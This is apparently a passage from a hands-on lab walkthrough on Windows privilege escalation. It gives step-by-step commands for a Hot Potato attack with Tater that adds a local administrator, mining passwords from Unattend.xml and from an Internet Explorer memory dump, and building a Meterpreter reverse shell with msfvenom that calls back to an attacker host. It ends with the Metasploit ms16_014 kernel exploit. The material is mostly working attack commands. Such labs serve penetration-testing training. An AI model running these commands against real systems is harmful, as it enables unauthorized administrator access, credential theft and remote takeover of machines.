3\. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

**Victim**

```
net localgroup administrators
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F5AdvNF8vxbxWdjAKK85u%2Fimage.png?alt=media&amp;token=f049cffd-7d13-4ce3-babe-217ba9b4b638" alt=""><figcaption></figcaption></figure>

## Potato Escalation - Hot Potato

### Exploitation

1\. In command prompt type: powershell.exe -nop -ep bypass

**Victim**

```
powershell.exe -nop -ep bypass
```

\
2\. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

**Victim(Powershell)**

```
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
```

\
3\. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

**Victim(Powershell)**

```
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
```

\
4\. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

**Victim(Powershell)**

```
net localgroup administrators
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FnsxCP9FWJy7bNrYoHtNe%2Fimage.png?alt=media&amp;token=f02f4489-5808-4b39-8aca-696c036e8438" alt=""><figcaption></figcaption></figure>

## Password Mining Escalation - Configuration Files

### Exploitation

1\. Open command prompt and type: typeC:\Windows\Panther\Unattend.xml

**Victim**

```
type C:\Windows\Panther\Unattend.xml
```

\
2\. Scroll down to the “\<Password>” property and copy the base64 string that is confined between the “\<Value>” tags underneath it.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FmLNs8a4RhrqBbFsCN21X%2Fimage.png?alt=media&amp;token=43012d05-b2ce-453e-8f7b-9b02088423a2" alt=""><figcaption></figcaption></figure>

1\. In a terminal, type: echo \[copied base64] | base64 -d

**Victim**

```
echo "cGFzc3dvcmQxMjM=" | base64 -d
```

\
2\. Notice the cleartext password

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fdff5VoSPQf0K0YYD4qIC%2Fimage.png?alt=media&amp;token=f6fe735e-02e8-41a3-afad-a4f4e5865dd2" alt=""><figcaption></figcaption></figure>

## Password Mining Escalation - Memory

### Exploitation

1.Open command prompt and type: msfconsole

**Kali**

```
msfconsole
```

\
2.In Metasploit (msf > prompt) type: use auxiliary/server/capture/http\_basic\
3.In Metasploit (msf > prompt) type: set uripath x\
4.In Metasploit (msf > prompt) type: run

**Kali(msfconsole)**

```
use auxiliary/server/capture/http_basic
set uripath x
set srvport 82
run
```

Windows VM

1. Open Internet Explorer and browse to: http\://\[Kali VM IP Address]/x

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FwIayMCOFS7TvfR15CfTk%2Fimage.png?alt=media&amp;token=c319e636-bfab-4ccc-8afe-5ac458072808" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Ftuml7voBB5GMsmi1YBj4%2Fimage.png?alt=media&amp;token=da546321-e61d-427e-8e23-5a4fc3d0b6a4" alt=""><figcaption></figcaption></figure>

2\. Open command prompt and type: taskmgr

**Victim**

```
taskmgr
```

\
3.In Windows Task Manager, right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu.<br>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FQpSj6DL37rPJVQi1QnIW%2Fimage.png?alt=media&amp;token=12417a72-0448-45eb-8994-844d351f0276" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FVz8vHSlBUMCeTAgz6E4C%2Fimage.png?alt=media&amp;token=fa94157c-ea84-4982-945d-ead4f0552c0f" alt=""><figcaption></figcaption></figure>

4.Copy the generated file, iexplore.DMP, to the Kali VM.

**Victim**

```
copy "C:\Users\user\AppData\Local\Temp\iexplore.DMP" \\tsclient\kali\iexplore.DMP 
```

\
1.Open command prompt and type: strings iexplore.DMP | grep "Authorization: Basic"

**Kali**

```
strings iexplore.DMP | grep "Authorization: Basic"
```

\
2.Select the Copy the Base64 encoded string.\
3.In command prompt type: echo -ne \[Base64 String] | base64 -d

**Victim**

```
echo -ne [Base64 String] | base64 -d
```

\
5.Notice the credentials in the output.

## Privilege Escalation - Kernel Exploits

### Establish a shell

**Kali VM**

1\. Open command prompt and type: msfconsole

**Kali**

```
msfconsole
```

\
2\. In Metasploit (msf > prompt) type: use multi/handler\
3\. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse\_tcp\
4\. In Metasploit (msf > prompt) type: set lhost \[Kali VM IP Address]\
5\. In Metasploit (msf > prompt) type: run

**Kali(msfconsole)**

```
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost $KALI
run
```

\
6\. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse\_tcp lhost=\[Kali VM IP Address] -f exe > shell.exe

**Kali**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=$KALI -f exe > shell.exe
```

\
7\. Copy the generated file, shell.exe, to the Windows VM.<br>

**Victim**

```
copy  \\tsclient\kali\shell.exe "C:\Users\user\Desktop\shell.exe" 
```

Windows VM

1\. Execute shell.exe and obtain reverse shell

**Victim**

```
"C:\Users\user\Desktop\shell.exe" 
```

### Detection & Exploitation<br>

**Kali VM**

1\. In Metasploit (msf > prompt) type: run post/multi/recon/local\_exploit\_suggester\
2\. Identify exploit/windows/local/ms16\_014\_wmi\_recv\_notif as a potential privilege escalation\
3\. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16\_014\_wmi\_recv\_notif\
4\. In Metasploit (msf > prompt) type: set SESSION \[meterpreter SESSION number]\
5\. In Metasploit (msf > prompt) type: set LPORT 5555\
6\. In Metasploit (msf > prompt) type: run

**Kali(msfconsole)**

```
background
back
run post/multi/recon/local_exploit_suggester
set SESSION $SESSION
run
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fzk0QOGlaLXXBdJIMN9Ml%2Fimage.png?alt=media&amp;token=88238c58-ae50-49ca-b0bf-86504b50a4ea" alt=""><figcaption></figcaption></figure>

**Kali(msfconsole)**

```
back
use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION $SESSION
run
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FdiuurhZQkTKBuSpwrot3%2Fimage.png?alt=media&amp;token=7ec8e22c-50bc-4d52-b272-c202b52fe6a6" alt=""><figcaption></figcaption></figure>

**Kali(meterpreter)**

```
shell
whoami
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FBfKq6g8NMVHslRCFfcNP%2Fimage.png?alt=media&amp;token=82956b34-a88c-4d3c-8fcc-182712b64830" alt=""><figcaption></figcaption></figure>
